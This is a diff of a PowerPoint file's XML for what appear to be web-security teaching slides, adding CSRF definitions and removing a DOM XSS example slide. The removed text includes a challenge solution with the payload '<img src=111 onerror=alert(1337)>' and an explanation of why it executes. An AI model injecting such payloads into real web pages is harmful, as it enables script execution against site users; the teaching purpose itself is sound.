+        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1931682337"/>
       </p:ext>
     </p:extLst>
   </p:cSld>
@@ -6945,7 +5529,7 @@
 </p:sld>
 </file>
 
-<file path=ppt/slides/slide16.xml><?xml version="1.0" encoding="utf-8"?>
+<file path=ppt/slides/slide13.xml><?xml version="1.0" encoding="utf-8"?>
 <p:sld xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
   <p:cSld>
     <p:spTree>
@@ -8383,7 +6967,7 @@
         </p:blipFill>
         <p:spPr>
           <a:xfrm>
-            <a:off x="0" y="0"/>
+            <a:off x="0" y="138988"/>
             <a:ext cx="12192000" cy="6858000"/>
           </a:xfrm>
           <a:prstGeom prst="rect">
@@ -8549,7 +7133,7 @@
         <p:spPr>
           <a:xfrm>
             <a:off x="292971" y="1768421"/>
-            <a:ext cx="11683681" cy="4102405"/>
+            <a:ext cx="11683681" cy="3102131"/>
           </a:xfrm>
           <a:prstGeom prst="rect">
             <a:avLst/>
@@ -8721,50 +7305,6 @@
               <a:solidFill>
                 <a:schemeClr val="bg1"/>
               </a:solidFill>
-              <a:latin typeface="Miriam Libre" pitchFamily="2" charset="-79"/>
-              <a:cs typeface="Miriam Libre" pitchFamily="2" charset="-79"/>
-            </a:endParaRPr>
-          </a:p>
-          <a:p>
-            <a:pPr>
-              <a:lnSpc>
-                <a:spcPts val="2560"/>
-              </a:lnSpc>
-            </a:pPr>
-            <a:r>
-              <a:rPr lang="en-US" sz="2400" b="1" dirty="0">
-                <a:solidFill>
-                  <a:schemeClr val="bg1"/>
-                </a:solidFill>
-                <a:latin typeface="Miriam Libre" pitchFamily="2" charset="-79"/>
-                <a:cs typeface="Miriam Libre" pitchFamily="2" charset="-79"/>
-              </a:rPr>
-              <a:t>Other client side vulnerabilities (which we will not discuss today) include:</a:t>
-            </a:r>
-          </a:p>
-          <a:p>
-            <a:pPr marL="342900" indent="-342900">
-              <a:lnSpc>
-                <a:spcPts val="2560"/>
-              </a:lnSpc>
-              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
-              <a:buChar char="•"/>
-            </a:pPr>
-            <a:r>
-              <a:rPr lang="en-US" sz="2400" b="1" dirty="0">
-                <a:solidFill>
-                  <a:schemeClr val="bg1"/>
-                </a:solidFill>
-                <a:latin typeface="Miriam Libre" pitchFamily="2" charset="-79"/>
-                <a:cs typeface="Miriam Libre" pitchFamily="2" charset="-79"/>
-              </a:rPr>
-              <a:t>Clickjacking, CORS misconfiguration, client-side prototype pollution and more.</a:t>
-            </a:r>
-            <a:endParaRPr lang="en-US" sz="2400" b="1" dirty="0">
-              <a:solidFill>
-                <a:schemeClr val="bg1"/>
-              </a:solidFill>
-              <a:effectLst/>
               <a:latin typeface="Miriam Libre" pitchFamily="2" charset="-79"/>
               <a:cs typeface="Miriam Libre" pitchFamily="2" charset="-79"/>
             </a:endParaRPr>
@@ -9147,7 +7687,7 @@
         <p:spPr>
           <a:xfrm>
             <a:off x="292971" y="1545612"/>
-            <a:ext cx="11444790" cy="4769254"/>
+            <a:ext cx="11444790" cy="4102405"/>
           </a:xfrm>
           <a:prstGeom prst="rect">
             <a:avLst/>
@@ -9252,25 +7792,30 @@
                 <a:latin typeface="Miriam Libre" pitchFamily="2" charset="-79"/>
                 <a:cs typeface="Miriam Libre" pitchFamily="2" charset="-79"/>
               </a:rPr>
-              <a:t>Arises when an application receives data in a request and includes (“reflects”) the that same data in it’s response in an unsafe way.</a:t>
-            </a:r>
-          </a:p>
-          <a:p>
-            <a:pPr marL="800100" lvl="1" indent="-342900">
-              <a:lnSpc>
-                <a:spcPts val="2560"/>
-              </a:lnSpc>
-              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
-              <a:buChar char="•"/>
-            </a:pPr>
-            <a:endParaRPr lang="en-US" sz="2400" dirty="0">
-              <a:solidFill>
-                <a:schemeClr val="bg1"/>
-              </a:solidFill>
-              <a:effectLst/>
-              <a:latin typeface="Miriam Libre" pitchFamily="2" charset="-79"/>
-              <a:cs typeface="Miriam Libre" pitchFamily="2" charset="-79"/>
-            </a:endParaRPr>
+              <a:t>when an XSS exploit is provided through a URL </a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" sz="2400" dirty="0" err="1">
+                <a:solidFill>
+                  <a:schemeClr val="bg1"/>
+                </a:solidFill>
+                <a:effectLst/>
+                <a:latin typeface="Miriam Libre" pitchFamily="2" charset="-79"/>
+                <a:cs typeface="Miriam Libre" pitchFamily="2" charset="-79"/>
+              </a:rPr>
+              <a:t>paramater</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" sz="2400" dirty="0">
+                <a:solidFill>
+                  <a:schemeClr val="bg1"/>
+                </a:solidFill>
+                <a:effectLst/>
+                <a:latin typeface="Miriam Libre" pitchFamily="2" charset="-79"/>
+                <a:cs typeface="Miriam Libre" pitchFamily="2" charset="-79"/>
+              </a:rPr>
+              <a:t>.</a:t>
+            </a:r>
           </a:p>
           <a:p>
             <a:pPr marL="800100" lvl="1" indent="-342900">
@@ -10113,7 +8658,7 @@
           <p:nvPr/>
         </p:nvPicPr>
         <p:blipFill>
-          <a:blip r:embed="rId2"/>
+          <a:blip r:embed="rId3"/>
           <a:srcRect/>
           <a:stretch/>
         </p:blipFill>
@@ -10141,8 +8686,8 @@
         </p:nvSpPr>
         <p:spPr>
           <a:xfrm>
-            <a:off x="124358" y="138988"/>
-            <a:ext cx="11923775" cy="1302106"/>
+            <a:off x="0" y="0"/>
+            <a:ext cx="3721001" cy="6858000"/>
           </a:xfrm>
           <a:prstGeom prst="rect">
             <a:avLst/>
@@ -10179,53 +8724,12 @@
           </a:p>
         </p:txBody>
       </p:sp>
-      <p:cxnSp>
-        <p:nvCxnSpPr>
-          <p:cNvPr id="9" name="Straight Connector 8">
-            <a:extLst>
-              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
-                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{E480B6B1-9BD0-C14D-6C35-046B181B096E}"/>
-              </a:ext>
-            </a:extLst>
-          </p:cNvPr>
-          <p:cNvCxnSpPr/>
-          <p:nvPr/>
-        </p:nvCxnSpPr>
-        <p:spPr>
-          <a:xfrm>
-            <a:off x="124358" y="6217920"/>
-            <a:ext cx="11923775" cy="73152"/>
-          </a:xfrm>
-          <a:prstGeom prst="line">
-            <a:avLst/>
-          </a:prstGeom>
-          <a:ln>
-            <a:solidFill>
-              <a:schemeClr val="bg1"/>
-            </a:solidFill>
-          </a:ln>
-        </p:spPr>
-        <p:style>
-          <a:lnRef idx="1">
-            <a:schemeClr val="accent1"/>
-          </a:lnRef>
-          <a:fillRef idx="0">
-            <a:schemeClr val="accent1"/>
-          </a:fillRef>
-          <a:effectRef idx="0">
-            <a:schemeClr val="accent1"/>
-          </a:effectRef>
-          <a:fontRef idx="minor">
-            <a:schemeClr val="tx1"/>
-          </a:fontRef>
-        </p:style>
-      </p:cxnSp>
-      <p:sp>
-        <p:nvSpPr>
-          <p:cNvPr id="2" name="TextBox 1">
-            <a:extLst>
-              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
-                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{3F1EB014-87E6-D8D7-1B7F-97DEF5C4AB55}"/>
+      <p:sp>
+        <p:nvSpPr>
+          <p:cNvPr id="4" name="TextBox 3">
+            <a:extLst>
+              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
+                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{E0871A74-CCF7-4C4E-1BED-D443B1E5C692}"/>
               </a:ext>
             </a:extLst>
           </p:cNvPr>
@@ -10234,8 +8738,8 @@
         </p:nvSpPr>
         <p:spPr>
           <a:xfrm>
-            <a:off x="292971" y="542106"/>
-            <a:ext cx="7850011" cy="584775"/>
+            <a:off x="4652389" y="1227270"/>
+            <a:ext cx="6447129" cy="3079048"/>
           </a:xfrm>
           <a:prstGeom prst="rect">
             <a:avLst/>
@@ -10248,60 +8752,26 @@
           </a:bodyPr>
           <a:lstStyle/>
           <a:p>
-            <a:pPr algn="l"/>
-            <a:r>
-              <a:rPr lang="en-US" sz="3200" b="1" dirty="0">
-                <a:solidFill>
-                  <a:srgbClr val="24272C"/>
+            <a:pPr marL="285750" indent="-285750">
+              <a:lnSpc>
+                <a:spcPts val="2560"/>
+              </a:lnSpc>
+              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
+              <a:buChar char="•"/>
+            </a:pPr>
+            <a:r>
+              <a:rPr lang="en-US" dirty="0">
+                <a:solidFill>
+                  <a:schemeClr val="bg1"/>
                 </a:solidFill>
                 <a:effectLst/>
                 <a:latin typeface="Miriam Libre" pitchFamily="2" charset="-79"/>
                 <a:cs typeface="Miriam Libre" pitchFamily="2" charset="-79"/>
               </a:rPr>
-              <a:t>Example – DOM XSS</a:t>
-            </a:r>
-            <a:endParaRPr lang="he-IL" sz="3200" b="1" dirty="0">
-              <a:solidFill>
-                <a:srgbClr val="24272C"/>
-              </a:solidFill>
-              <a:effectLst/>
-              <a:latin typeface="Miriam Libre" pitchFamily="2" charset="-79"/>
-              <a:cs typeface="Miriam Libre" pitchFamily="2" charset="-79"/>
-            </a:endParaRPr>
-          </a:p>
-        </p:txBody>
-      </p:sp>
-      <p:sp>
-        <p:nvSpPr>
-          <p:cNvPr id="8" name="TextBox 7">
-            <a:extLst>
-              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
-                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{0A5D91F2-EE24-3166-CD6C-BAFBC797325C}"/>
-              </a:ext>
-            </a:extLst>
-          </p:cNvPr>
-          <p:cNvSpPr txBox="1"/>
-          <p:nvPr/>
-        </p:nvSpPr>
-        <p:spPr>
-          <a:xfrm>
-            <a:off x="292971" y="6365895"/>
-            <a:ext cx="6097218" cy="253916"/>
-          </a:xfrm>
-          <a:prstGeom prst="rect">
-            <a:avLst/>
-          </a:prstGeom>
-          <a:noFill/>
-        </p:spPr>
-        <p:txBody>
-          <a:bodyPr wrap="square">
-            <a:spAutoFit/>
-          </a:bodyPr>
-          <a:lstStyle/>
-          <a:p>
-            <a:pPr marL="0" defTabSz="914400" eaLnBrk="1" latinLnBrk="0" hangingPunct="1"/>
-            <a:r>
-              <a:rPr lang="en-US" sz="1000" dirty="0">
+              <a:t>As the name suggests, CSRF is about </a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" b="1" dirty="0">
                 <a:solidFill>
                   <a:schemeClr val="bg1"/>
                 </a:solidFill>
@@ -10309,24 +8779,137 @@
                 <a:latin typeface="Miriam Libre" pitchFamily="2" charset="-79"/>
                 <a:cs typeface="Miriam Libre" pitchFamily="2" charset="-79"/>
               </a:rPr>
-              <a:t>Example – DOM XSS</a:t>
-            </a:r>
-            <a:endParaRPr lang="en-IL" sz="1000" dirty="0">
-              <a:solidFill>
-                <a:schemeClr val="bg1"/>
-              </a:solidFill>
-              <a:latin typeface="Miriam Libre" pitchFamily="2" charset="-79"/>
-              <a:cs typeface="Miriam Libre" pitchFamily="2" charset="-79"/>
-            </a:endParaRPr>
+              <a:t>Forging (Faking) requests</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" dirty="0">
+                <a:solidFill>
+                  <a:schemeClr val="bg1"/>
+                </a:solidFill>
+                <a:effectLst/>
+                <a:latin typeface="Miriam Libre" pitchFamily="2" charset="-79"/>
+                <a:cs typeface="Miriam Libre" pitchFamily="2" charset="-79"/>
+              </a:rPr>
+              <a:t>.</a:t>
+            </a:r>
+          </a:p>
+          <a:p>
+            <a:pPr marL="285750" indent="-285750">
+              <a:lnSpc>
+                <a:spcPts val="2560"/>
+              </a:lnSpc>
+              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
+              <a:buChar char="•"/>
+            </a:pPr>
+            <a:r>
+              <a:rPr lang="en-US" dirty="0">
+                <a:solidFill>
+                  <a:schemeClr val="bg1"/>
+                </a:solidFill>
+                <a:effectLst/>
+                <a:latin typeface="Miriam Libre" pitchFamily="2" charset="-79"/>
+                <a:cs typeface="Miriam Libre" pitchFamily="2" charset="-79"/>
+              </a:rPr>
+              <a:t> </a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" dirty="0">
+                <a:solidFill>
+                  <a:schemeClr val="bg1"/>
+                </a:solidFill>
+                <a:latin typeface="Miriam Libre" pitchFamily="2" charset="-79"/>
+                <a:cs typeface="Miriam Libre" pitchFamily="2" charset="-79"/>
+              </a:rPr>
+              <a:t>It happens when the web application does not properly verify the </a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" b="1" dirty="0">
+                <a:solidFill>
+                  <a:schemeClr val="bg1"/>
+                </a:solidFill>
+                <a:latin typeface="Miriam Libre" pitchFamily="2" charset="-79"/>
+                <a:cs typeface="Miriam Libre" pitchFamily="2" charset="-79"/>
+              </a:rPr>
+              <a:t>legitimacy</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" dirty="0">
+                <a:solidFill>
+                  <a:schemeClr val="bg1"/>
+                </a:solidFill>
+                <a:latin typeface="Miriam Libre" pitchFamily="2" charset="-79"/>
+                <a:cs typeface="Miriam Libre" pitchFamily="2" charset="-79"/>
+              </a:rPr>
+              <a:t> of a request that it receives.</a:t>
+            </a:r>
+          </a:p>
+          <a:p>
+            <a:pPr marL="285750" indent="-285750">
+              <a:lnSpc>
+                <a:spcPts val="2560"/>
+              </a:lnSpc>
+              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
+              <a:buChar char="•"/>
+            </a:pPr>
+            <a:r>
+              <a:rPr lang="en-US" dirty="0">
+                <a:solidFill>
+                  <a:schemeClr val="bg1"/>
+                </a:solidFill>
+                <a:latin typeface="Miriam Libre" pitchFamily="2" charset="-79"/>
+                <a:cs typeface="Miriam Libre" pitchFamily="2" charset="-79"/>
+              </a:rPr>
+              <a:t>CSRF attacks are usually a fancy name for </a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" b="1" dirty="0">
+                <a:solidFill>
+                  <a:schemeClr val="bg1"/>
+                </a:solidFill>
+                <a:latin typeface="Miriam Libre" pitchFamily="2" charset="-79"/>
+                <a:cs typeface="Miriam Libre" pitchFamily="2" charset="-79"/>
+              </a:rPr>
+              <a:t>session hijacking </a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" dirty="0">
+                <a:solidFill>
+                  <a:schemeClr val="bg1"/>
+                </a:solidFill>
+                <a:latin typeface="Miriam Libre" pitchFamily="2" charset="-79"/>
+                <a:cs typeface="Miriam Libre" pitchFamily="2" charset="-79"/>
+              </a:rPr>
+              <a:t>– where attackers use the victim’s </a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" b="1" dirty="0">
+                <a:solidFill>
+                  <a:schemeClr val="bg1"/>
+                </a:solidFill>
+                <a:latin typeface="Miriam Libre" pitchFamily="2" charset="-79"/>
+                <a:cs typeface="Miriam Libre" pitchFamily="2" charset="-79"/>
+              </a:rPr>
+              <a:t>session</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" dirty="0">
+                <a:solidFill>
+                  <a:schemeClr val="bg1"/>
+                </a:solidFill>
+                <a:latin typeface="Miriam Libre" pitchFamily="2" charset="-79"/>
+                <a:cs typeface="Miriam Libre" pitchFamily="2" charset="-79"/>
+              </a:rPr>
+              <a:t> on a website in order to perform unwanted actions on the victim’s behalf.</a:t>
+            </a:r>
           </a:p>
         </p:txBody>
       </p:sp>
       <p:pic>
         <p:nvPicPr>
-          <p:cNvPr id="10" name="Picture 9">
-            <a:extLst>
-              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
-                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{9F67AEC4-71D1-89EA-5D3E-E83882E2C956}"/>
+          <p:cNvPr id="7" name="Picture 6">
+            <a:extLst>
+              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
+                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{1E33D056-14AE-5D73-871C-973D5A05365A}"/>
               </a:ext>
             </a:extLst>
           </p:cNvPr>
@@ -10336,14 +8919,14 @@
           <p:nvPr/>
         </p:nvPicPr>
         <p:blipFill>
-          <a:blip r:embed="rId3"/>
+          <a:blip r:embed="rId4"/>
           <a:srcRect/>
           <a:stretch/>
         </p:blipFill>
         <p:spPr>
           <a:xfrm>
-            <a:off x="9000489" y="6377732"/>
-            <a:ext cx="2717380" cy="221561"/>
+            <a:off x="8370558" y="524524"/>
+            <a:ext cx="2989117" cy="243717"/>
           </a:xfrm>
           <a:prstGeom prst="rect">
             <a:avLst/>
@@ -10352,10 +8935,10 @@
       </p:pic>
       <p:sp>
         <p:nvSpPr>
-          <p:cNvPr id="16" name="TextBox 15">
-            <a:extLst>
-              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
-                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{C4A670BD-4775-42AB-9ECC-A2EBC19E5B98}"/>
+          <p:cNvPr id="2" name="TextBox 1">
+            <a:extLst>
+              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
+                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{F5834BB2-234E-BDD1-E7AE-CD78CC5E6535}"/>
               </a:ext>
             </a:extLst>
           </p:cNvPr>
@@ -10364,8 +8947,8 @@
         </p:nvSpPr>
         <p:spPr>
           <a:xfrm>
-            <a:off x="2982255" y="1441094"/>
-            <a:ext cx="6187786" cy="3970318"/>
+            <a:off x="633984" y="1254616"/>
+            <a:ext cx="2830735" cy="2298065"/>
           </a:xfrm>
           <a:prstGeom prst="rect">
             <a:avLst/>
@@ -10373,151 +8956,34 @@
           <a:noFill/>
         </p:spPr>
         <p:txBody>
-          <a:bodyPr wrap="square">
+          <a:bodyPr wrap="square" rtlCol="0">
             <a:spAutoFit/>
           </a:bodyPr>
           <a:lstStyle/>
           <a:p>
-            <a:r>
-              <a:rPr lang="en-US" sz="3600" dirty="0">
-                <a:hlinkClick r:id="rId4"/>
-              </a:rPr>
-              <a:t>https://xss.pwnfunction.com </a:t>
-            </a:r>
-            <a:endParaRPr lang="en-US" sz="3600" dirty="0"/>
-          </a:p>
-          <a:p>
-            <a:endParaRPr lang="en-US" sz="3600" dirty="0"/>
-          </a:p>
-          <a:p>
-            <a:r>
-              <a:rPr lang="en-US" sz="3600" dirty="0">
-                <a:solidFill>
-                  <a:schemeClr val="bg1"/>
-                </a:solidFill>
-                <a:latin typeface="Miriam Libre" pitchFamily="2" charset="-79"/>
-                <a:cs typeface="Miriam Libre" pitchFamily="2" charset="-79"/>
-              </a:rPr>
-              <a:t>Solution to Ma </a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="en-US" sz="3600" dirty="0" err="1">
-                <a:solidFill>
-                  <a:schemeClr val="bg1"/>
-                </a:solidFill>
-                <a:latin typeface="Miriam Libre" pitchFamily="2" charset="-79"/>
-                <a:cs typeface="Miriam Libre" pitchFamily="2" charset="-79"/>
-              </a:rPr>
-              <a:t>Spaghet</a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="en-US" sz="3600" dirty="0">
-                <a:solidFill>
-                  <a:schemeClr val="bg1"/>
-                </a:solidFill>
-                <a:latin typeface="Miriam Libre" pitchFamily="2" charset="-79"/>
-                <a:cs typeface="Miriam Libre" pitchFamily="2" charset="-79"/>
-              </a:rPr>
-              <a:t>:</a:t>
-            </a:r>
-          </a:p>
-          <a:p>
-            <a:r>
-              <a:rPr lang="en-US" dirty="0">
-                <a:solidFill>
-                  <a:schemeClr val="bg1"/>
-                </a:solidFill>
-                <a:latin typeface="Miriam Libre" pitchFamily="2" charset="-79"/>
-                <a:cs typeface="Miriam Libre" pitchFamily="2" charset="-79"/>
-              </a:rPr>
-              <a:t>We can’t use &lt;script&gt;alert(1337)&lt;/script&gt; because the page is already loaded, and the browser only executes JavaScript in &lt;script&gt; when the website is loaded. Instead, we can use something like &lt;</a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="en-US" dirty="0" err="1">
-                <a:solidFill>
-                  <a:schemeClr val="bg1"/>
-                </a:solidFill>
-                <a:latin typeface="Miriam Libre" pitchFamily="2" charset="-79"/>
-                <a:cs typeface="Miriam Libre" pitchFamily="2" charset="-79"/>
-              </a:rPr>
-              <a:t>img</a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="en-US" dirty="0">
-                <a:solidFill>
-                  <a:schemeClr val="bg1"/>
-                </a:solidFill>
-                <a:latin typeface="Miriam Libre" pitchFamily="2" charset="-79"/>
-                <a:cs typeface="Miriam Libre" pitchFamily="2" charset="-79"/>
-              </a:rPr>
-              <a:t> </a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="en-US" dirty="0" err="1">
-                <a:solidFill>
-                  <a:schemeClr val="bg1"/>
-                </a:solidFill>
-                <a:latin typeface="Miriam Libre" pitchFamily="2" charset="-79"/>
-                <a:cs typeface="Miriam Libre" pitchFamily="2" charset="-79"/>
-              </a:rPr>
-              <a:t>src</a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="en-US" dirty="0">
-                <a:solidFill>
-                  <a:schemeClr val="bg1"/>
-                </a:solidFill>
-                <a:latin typeface="Miriam Libre" pitchFamily="2" charset="-79"/>
-                <a:cs typeface="Miriam Libre" pitchFamily="2" charset="-79"/>
-              </a:rPr>
-              <a:t>=111 </a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="en-US" dirty="0" err="1">
-                <a:solidFill>
-                  <a:schemeClr val="bg1"/>
-                </a:solidFill>
-                <a:latin typeface="Miriam Libre" pitchFamily="2" charset="-79"/>
-                <a:cs typeface="Miriam Libre" pitchFamily="2" charset="-79"/>
-              </a:rPr>
-              <a:t>onerror</a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="en-US" dirty="0">
-                <a:solidFill>
-                  <a:schemeClr val="bg1"/>
-                </a:solidFill>
-                <a:latin typeface="Miriam Libre" pitchFamily="2" charset="-79"/>
-                <a:cs typeface="Miriam Libre" pitchFamily="2" charset="-79"/>
-              </a:rPr>
-              <a:t>=alert(1337)&gt;, and this will force the website to look for the image in order to load it, it will error out since “111” isn’t a valid path, and our </a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="en-US" dirty="0" err="1">
-                <a:solidFill>
-                  <a:schemeClr val="bg1"/>
-                </a:solidFill>
-                <a:latin typeface="Miriam Libre" pitchFamily="2" charset="-79"/>
-                <a:cs typeface="Miriam Libre" pitchFamily="2" charset="-79"/>
-              </a:rPr>
-              <a:t>onerror</a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="en-US" dirty="0">
-                <a:solidFill>
-                  <a:schemeClr val="bg1"/>
-                </a:solidFill>
-                <a:latin typeface="Miriam Libre" pitchFamily="2" charset="-79"/>
-                <a:cs typeface="Miriam Libre" pitchFamily="2" charset="-79"/>
-              </a:rPr>
-              <a:t> event attribute will get executed.</a:t>
-            </a:r>
-            <a:endParaRPr lang="en-IL" dirty="0">
+            <a:pPr algn="l">
+              <a:lnSpc>
+                <a:spcPts val="4280"/>
+              </a:lnSpc>
+            </a:pPr>
+            <a:r>
+              <a:rPr lang="en-US" sz="3600" b="1" spc="120" dirty="0">
+                <a:solidFill>
+                  <a:srgbClr val="24272C"/>
+                </a:solidFill>
+                <a:effectLst/>
+                <a:latin typeface="Handjet Medium Square Single" pitchFamily="2" charset="0"/>
+                <a:cs typeface="Handjet Medium Square Single" pitchFamily="2" charset="0"/>
+              </a:rPr>
+              <a:t>Cross site Request Forgery (CSRF)</a:t>
+            </a:r>
+            <a:endParaRPr lang="he-IL" sz="3600" b="1" spc="120" dirty="0">
               <a:solidFill>
-                <a:schemeClr val="bg1"/>
+                <a:srgbClr val="24272C"/>
               </a:solidFill>
-              <a:latin typeface="Miriam Libre" pitchFamily="2" charset="-79"/>
-              <a:cs typeface="Miriam Libre" pitchFamily="2" charset="-79"/>
+              <a:effectLst/>
+              <a:latin typeface="Handjet Medium Square Single" pitchFamily="2" charset="0"/>
+              <a:cs typeface="Handjet Medium Square Single" pitchFamily="2" charset="0"/>
             </a:endParaRPr>
           </a:p>
         </p:txBody>
@@ -10525,7 +8991,7 @@
     </p:spTree>
     <p:extLst>
       <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
-        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2551422944"/>
+        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1939679815"/>
       </p:ext>
     </p:extLst>
   </p:cSld>
@@ -10595,8 +9061,8 @@
         </p:nvSpPr>
         <p:spPr>
           <a:xfrm>
-            <a:off x="124358" y="138988"/>
-            <a:ext cx="11923775" cy="1302106"/>
+            <a:off x="0" y="0"/>
+            <a:ext cx="3215514" cy="6858000"/>
           </a:xfrm>
           <a:prstGeom prst="rect">
             <a:avLst/>
@@ -10633,53 +9099,12 @@
           </a:p>
         </p:txBody>
       </p:sp>
-      <p:cxnSp>
-        <p:nvCxnSpPr>
-          <p:cNvPr id="9" name="Straight Connector 8">
-            <a:extLst>
-              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
-                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{E480B6B1-9BD0-C14D-6C35-046B181B096E}"/>
-              </a:ext>
-            </a:extLst>
-          </p:cNvPr>
-          <p:cNvCxnSpPr/>
-          <p:nvPr/>
-        </p:nvCxnSpPr>
-        <p:spPr>
-          <a:xfrm>
-            <a:off x="124358" y="6217920"/>
-            <a:ext cx="11923775" cy="73152"/>
-          </a:xfrm>
-          <a:prstGeom prst="line">
-            <a:avLst/>
-          </a:prstGeom>
-          <a:ln>
-            <a:solidFill>
-              <a:schemeClr val="bg1"/>
-            </a:solidFill>
-          </a:ln>
-        </p:spPr>
-        <p:style>
-          <a:lnRef idx="1">
-            <a:schemeClr val="accent1"/>
-          </a:lnRef>
-          <a:fillRef idx="0">
-            <a:schemeClr val="accent1"/>
-          </a:fillRef>
-          <a:effectRef idx="0">
-            <a:schemeClr val="accent1"/>
-          </a:effectRef>
-          <a:fontRef idx="minor">
-            <a:schemeClr val="tx1"/>
-          </a:fontRef>
-        </p:style>
-      </p:cxnSp>
-      <p:sp>
-        <p:nvSpPr>
-          <p:cNvPr id="2" name="TextBox 1">
-            <a:extLst>
-              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
-                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{3F1EB014-87E6-D8D7-1B7F-97DEF5C4AB55}"/>
+      <p:sp>
+        <p:nvSpPr>
+          <p:cNvPr id="4" name="TextBox 3">
+            <a:extLst>
+              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
+                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{E0871A74-CCF7-4C4E-1BED-D443B1E5C692}"/>
               </a:ext>
             </a:extLst>
           </p:cNvPr>
@@ -10688,8 +9113,8 @@
         </p:nvSpPr>
         <p:spPr>
           <a:xfrm>
-            <a:off x="292971" y="542106"/>
-            <a:ext cx="7850011" cy="584775"/>
+            <a:off x="3416400" y="760985"/>
+            <a:ext cx="8775600" cy="4412746"/>
           </a:xfrm>
           <a:prstGeom prst="rect">
             <a:avLst/>
@@ -10702,69 +9127,219 @@
           </a:bodyPr>
           <a:lstStyle/>
           <a:p>
-            <a:pPr algn="l"/>
-            <a:r>
-              <a:rPr lang="en-US" sz="3200" b="1" dirty="0">
-                <a:solidFill>
-                  <a:srgbClr val="24272C"/>
+            <a:pPr marL="285750" indent="-285750">
+              <a:lnSpc>
+                <a:spcPts val="2560"/>
+              </a:lnSpc>
+              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
+              <a:buChar char="•"/>
+            </a:pPr>
+            <a:r>
+              <a:rPr lang="en-US" dirty="0">
+                <a:solidFill>
+                  <a:schemeClr val="bg1"/>
                 </a:solidFill>
                 <a:effectLst/>
                 <a:latin typeface="Miriam Libre" pitchFamily="2" charset="-79"/>
                 <a:cs typeface="Miriam Libre" pitchFamily="2" charset="-79"/>
               </a:rPr>
-              <a:t>Example – Stored XSS</a:t>
-            </a:r>
-            <a:endParaRPr lang="he-IL" sz="3200" b="1" dirty="0">
-              <a:solidFill>
-                <a:srgbClr val="24272C"/>
-              </a:solidFill>
-              <a:effectLst/>
-              <a:latin typeface="Miriam Libre" pitchFamily="2" charset="-79"/>
-              <a:cs typeface="Miriam Libre" pitchFamily="2" charset="-79"/>
-            </a:endParaRPr>
-          </a:p>
-        </p:txBody>
-      </p:sp>
-      <p:sp>
-        <p:nvSpPr>
-          <p:cNvPr id="8" name="TextBox 7">
-            <a:extLst>
-              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
-                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{0A5D91F2-EE24-3166-CD6C-BAFBC797325C}"/>
-              </a:ext>
-            </a:extLst>
